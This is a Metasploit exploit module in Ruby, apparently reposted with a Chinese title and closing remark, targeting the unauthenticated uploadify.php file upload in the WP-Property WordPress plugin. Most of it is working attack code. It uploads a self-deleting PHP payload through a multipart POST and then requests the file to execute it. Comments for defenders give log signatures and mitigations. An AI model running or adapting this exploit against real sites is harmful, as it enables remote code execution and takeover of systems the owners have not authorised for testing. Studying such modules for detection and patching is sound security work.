WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

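require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0 according to the module description).
#
# Root cause, as far as this listing shows: the plugin ships
# third-party/uploadify/uploadify.php, which accepts a multipart upload
# ("Filedata" plus a "folder" field) without authentication and stores the
# file under a web-served path, so an uploaded .php file is executed by the
# web server when it is requested.
#
# Notes for defenders reading this module:
# * Web-log signature: a POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   followed by a GET for a five-letter, randomly named .php file at the path
#   the upload script returned in its response body.
# * The stub is generated with :unlink_self => true, so the uploaded file is
#   expected to remove itself once it has run; an absent file on disk does not
#   rule out compromise. Rely on request logs and process/network telemetry.
# * Mitigation: move to a plugin release newer than the affected range, delete
#   the bundled uploadify.php if it is still present, and deny PHP execution
#   in directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (references, targets, payload constraints)
  # and the single TARGETURI option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with the
  #   values below via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Reports whether the upload script is reachable.
  #
  # This is a presence test only: any HTTP 200 for uploadify.php yields
  # Appears. It does not read the plugin version and does not attempt an
  # upload, so a patched or access-restricted script that still answers 200
  # is reported the same way. Treat the result as "needs manual confirmation"
  # in an assessment report.
  #
  # @return [Exploit::CheckCode::Unknown] no response or a non-200 status
  # @return [Exploit::CheckCode::Appears] the script answered with 200
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP stub through uploadify.php and then requests it.
  #
  # Two requests are sent, which is what shows up in the target's access log:
  # a multipart POST to uploadify.php, then a GET for the path the script
  # echoed back. The module aborts with UnexpectedReply when the POST gets no
  # response, a non-200 status, or a body that does not contain the generated
  # file name.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name; the stub is built so that it deletes itself
    # after running (:unlink_self), leaving request logs as the main artefact.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Strip the CRLF that precedes a part boundary at the start of a line in
    # the serialized MIME message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body of the upload script is used verbatim as the request
    # path of the follow-up GET.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end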
不要问我这写的是什么 怎么利用 我是说msf.